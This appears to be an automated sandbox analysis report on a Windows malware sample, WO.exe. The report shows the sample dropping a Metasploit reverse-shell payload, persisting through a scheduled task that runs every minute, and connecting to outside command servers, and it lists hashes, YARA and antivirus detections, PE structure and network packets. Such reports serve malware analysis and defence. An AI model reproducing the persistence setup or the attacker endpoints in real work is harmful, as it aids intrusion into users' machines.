                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkwhofof.0vp.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqxfib4i.yrz.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osp5dsxj.5li.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1vaoogw.zom.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rruck55l.m3v.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxubr5ga.clf.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdvwz1i5.pnf.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2jjetqy.uip.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\reddit.exe

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):73802
                                                            Entropy (8bit):6.316899506372099
                                                            Encrypted:false
                                                            SSDEEP:1536:I15v3HYXkOXlgX3p+f4RYuL47YzAnsVebkTsT5Wj6Mb+KR0Nc8QsJq39:Y5v3Y0O1u3pplqvnsG+8e0Nc8QsC9
                                                            MD5:23544090C6D379E3ECA7343C4F05D4D2
                                                            SHA1:C9250E363790A573E9921A68B7ABE64F27E63DF1
                                                            SHA-256:B439D22ED2C1E1F83F3C52D1A7307D9AEE8B516166AB221CB6D67B188CD80F56
                                                            SHA-512:6ACA78B0653E87AC80D7F562E6AB6D650F4D53D375CAD043EB9613C7BBD642F7F82564A872B1B05520A77ACBEBA9DA0540C4CD5A855A28A8188EBE3A4B57775C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_MetasploitPayload, Description: Yara detected Metasploit Payload, Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: Joe Security
                                                            • Rule: Windows_Trojan_Metasploit_4a1c4da8, Description: Identifies Metasploit 64 bit reverse tcp shellcode., Source: C:\Users\user\AppData\Local\Temp\reddit.exe, Author: unknown
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8...Y...Y...Y...E...Y..TE...Y...F...Y...F...Y...Y...Y..TQ..Y...z...Y..._...Y..Rich.Y..................PE..L....5EJ.............................%............@..........................`..............................................l...x....P...............................................................................................................text...f........................... ..`.rdata..............................@..@.data...\p.......@..................@....rsrc........P......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe

                                                            Download File
                                                            Process:C:\Windows\System32\cmd.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):129024
                                                            Entropy (8bit):6.5063374280780675
                                                            Encrypted:false
                                                            SSDEEP:3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
                                                            MD5:7176B040816932541EB9C2B91D90B29B
                                                            SHA1:137A9C4620366CAFF2A1D1C297B6AE8C6D28761D
                                                            SHA-256:DB9756031D99DCDDAE9E9254BD76156A580331A43802B6FAA68D2FD62C5B7E95
                                                            SHA-512:1332645E8C6B53994B4F3F28B980C1FE646CEC1771E77982A85EC4036725F4F2930BD9A45CAEA8A03B8A8ECE0B432955B0D55E09396F5A80FD7C0D2825B0D1DE
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................@....................................................................... ..................................................................................H............................code....Z.......\.................. ..`.text........p.......`.............. ..`.rdata..-K.......L...d..............@..@.pdata..............................@..@.data....#..........................@....rsrc........ ... ..................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\System32\cmd.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            \Device\Null

                                                            Download File
                                                            Process:C:\Windows\System32\schtasks.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):256
                                                            Entropy (8bit):3.1204038061804953
                                                            Encrypted:false
                                                            SSDEEP:3:wKPQotEWNFWJOFsF5/19gdAiy/wcA1F/3hiFE:3PXWJOKH/19liyx+HmE
                                                            MD5:68D8BE12488F094D89E38F2DB94084CF
                                                            SHA1:6B9E94D65E99061E28A386B421CBDF38701563F1
                                                            SHA-256:EE84BBD7268F3E8737E118A5AAFF6D0510578FE741763AB164EA9AE26FA49214
                                                            SHA-512:86EEA7D15D31626A3244DC64160895586851E252FE124C300B4269FA68B7EC51775FD8E6CB17F54FB2999A44EE206F776EC7E7C3A9FB12E7D2040FA9B92FF5D5
                                                            Malicious:false
                                                            Preview:..Folder: \..TaskName Next Run Time Status ..======================================== ====================== ===============..RunRedditMinute 23/12/2024 13:56:00 Running ..

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):6.5063374280780675
                                                            TrID:
                                                            • Win64 Executable GUI (202006/5) 92.64%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • VXD Driver (31/22) 0.01%
                                                            File name:WO.exe
                                                            File size:129'024 bytes
                                                            MD5:7176b040816932541eb9c2b91d90b29b
                                                            SHA1:137a9c4620366caff2a1d1c297b6ae8c6d28761d
                                                            SHA256:db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95
                                                            SHA512:1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de
                                                            SSDEEP:3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn
                                                            TLSH:A9C32766B2A4119DDBB181F6D8911706EA7070B11B15A3DB7B7853F21B2B6C68F3C3B0
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................@.............................................

                                                            File Icon

                                                            Icon Hash:cbf838d8ce73190e

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x140001000
                                                            Entrypoint Section:.code
                                                            Digitally signed:false
                                                            Imagebase:0x140000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:
                                                            Time Stamp:0x5A736DDC [Thu Feb 1 19:43:24 2018 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e

                                                            Entrypoint Preview

                                                            Instruction
                                                            dec eax
                                                            sub esp, 28h
                                                            dec ecx
                                                            mov eax, 00000160h
                                                            dec eax
                                                            xor edx, edx
                                                            dec eax
                                                            mov ecx, 40020444h
                                                            add dword ptr [eax], eax
                                                            add byte ptr [eax], al
                                                            call 00007F5688EEC058h
                                                            dec eax
                                                            xor ecx, ecx
                                                            call 00007F5688EEC056h
                                                            dec eax
                                                            mov dword ptr [0001F420h], eax
                                                            dec ebp
                                                            xor eax, eax
                                                            dec eax
                                                            mov edx, 00001000h
                                                            dec eax
                                                            xor ecx, ecx
                                                            call 00007F5688EEC043h
                                                            dec eax
                                                            mov dword ptr [0001F3FFh], eax
                                                            dec eax
                                                            mov eax, 4001F088h
                                                            add dword ptr [eax], eax
                                                            add byte ptr [eax], al
                                                            dec eax
                                                            mov dword ptr [0001F43Eh], eax
                                                            call 00007F5688EF707Ah
                                                            call 00007F5688EF6D09h
                                                            call 00007F5688EF2E30h
                                                            call 00007F5688EF2423h
                                                            call 00007F5688EF1CB2h
                                                            call 00007F5688EF1981h
                                                            call 00007F5688EF1078h
                                                            call 00007F5688EF052Fh
                                                            call 00007F5688EEC152h
                                                            call 00007F5688EF5015h
                                                            call 00007F5688EF3874h
                                                            dec eax
                                                            mov edx, 4001F02Ah
                                                            add dword ptr [eax], eax
                                                            add byte ptr [eax], al
                                                            dec eax
                                                            lea ecx, dword ptr [0001F3C6h]
                                                            call 00007F5688EF70A2h
                                                            dec eax
                                                            mov ecx, FFFFFFF5h

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1f1980xc8.data
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x1ff0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1d0000x10c8.pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x1f6a80x448.data
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .code0x10000x5a990x5c001d0c9527ee8a05d865534bbee542e47eFalse0.364937160326087data5.471300917234666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .text0x70000x102c50x104006e20cd0789b9aa50422f27883fd5e9bcFalse0.4876201923076923data6.333951903059359IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x180000x4b2d0x4c005adef60093ee71127f4e613fda5f050fFalse0.6623149671052632VAX-order 68k Blit mpx/mux executable6.662073317603483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .pdata0x1d0000x10c80x1200415f7b43ac6a86ff843649544b818973False0.466796875data4.88380909718978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x1f0000x23180x16003b35fef9f8efd11d0fd11c512f35d665False0.32865767045454547data4.299905086985605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x220000x1ff00x20001e818fbf0d62bea6c3bd7fe5db2069e6False0.62890625data6.361691675494712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x222ac0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.3942307692307692
                                                            RT_RCDATA0x233540x9c7data1.0043947263284059
                                                            RT_RCDATA0x23d1c0xezlib compressed data1.5714285714285714
                                                            RT_RCDATA0x23d2c0x1very short file (no magic)9.0
                                                            RT_RCDATA0x23d300x9data1.8888888888888888
                                                            RT_GROUP_ICON0x23d3c0x14data1.1
                                                            RT_MANIFEST0x23d500x2a0XML 1.0 document, ASCII text, with very long lines (672), with no line terminators0.5520833333333334

                                                            Imports

                                                            DLLImport
                                                            msvcrt.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                                            KERNEL32.dllGetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                                            SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                                            WINMM.DLLtimeBeginPeriod
                                                            OLE32.DLLCoInitialize, CoTaskMemFree
                                                            SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                                            USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                                            GDI32.DLLGetStockObject
                                                            COMCTL32.DLLInitCommonControlsEx

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-23T19:54:05.154586+01002820208ETPRO MALWARE Possible Metasploit Payload (AB Template PDB)1185.151.51.214443192.168.2.449730TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 23, 2024 19:54:02.069828033 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:02.069895983 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:02.070873976 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:02.094254971 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:02.094275951 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:03.799760103 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:03.799880028 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:03.802603960 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:03.802619934 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:03.802885056 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:03.814167023 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:03.859334946 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.824199915 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.824244022 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.824259043 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.824320078 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:04.824351072 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.824393988 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:04.862031937 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.862066984 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.862154961 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:04.862163067 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:04.862195015 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.106182098 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.106204987 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.106288910 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.106308937 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.106348038 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.139035940 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.139056921 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.139110088 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.139116049 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.139184952 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.154383898 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.154481888 CET44349730185.151.51.214192.168.2.4
                                                            Dec 23, 2024 19:54:05.154495955 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.154534101 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.156861067 CET49730443192.168.2.4185.151.51.214
                                                            Dec 23, 2024 19:54:05.249785900 CET497311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:05.370362043 CET112149731147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:05.370456934 CET497311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:12.682234049 CET497321121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:12.701083899 CET497331121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:12.802158117 CET112149732147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:12.802254915 CET497321121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:12.820744991 CET112149733147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:12.820847988 CET497331121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:27.306339979 CET112149731147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:27.306437016 CET497311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:27.308517933 CET497311121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:27.309370041 CET497401121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:27.428148031 CET112149731147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:27.428987980 CET112149740147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:27.429121017 CET497401121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.728704929 CET112149732147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:34.728806019 CET497321121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.730112076 CET497321121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.732821941 CET497411121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.744146109 CET112149733147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:34.744225979 CET497331121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.744611025 CET497331121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.745378971 CET497421121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.850126982 CET112149732147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:34.852796078 CET112149741147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:34.853009939 CET497411121192.168.2.4147.185.221.23
                                                            Dec 23, 2024 19:54:34.864099979 CET112149733147.185.221.23192.168.2.4
                                                            Dec 23, 2024 19:54:34.864973068 CET112149742147.185.221.23192.168.2.4
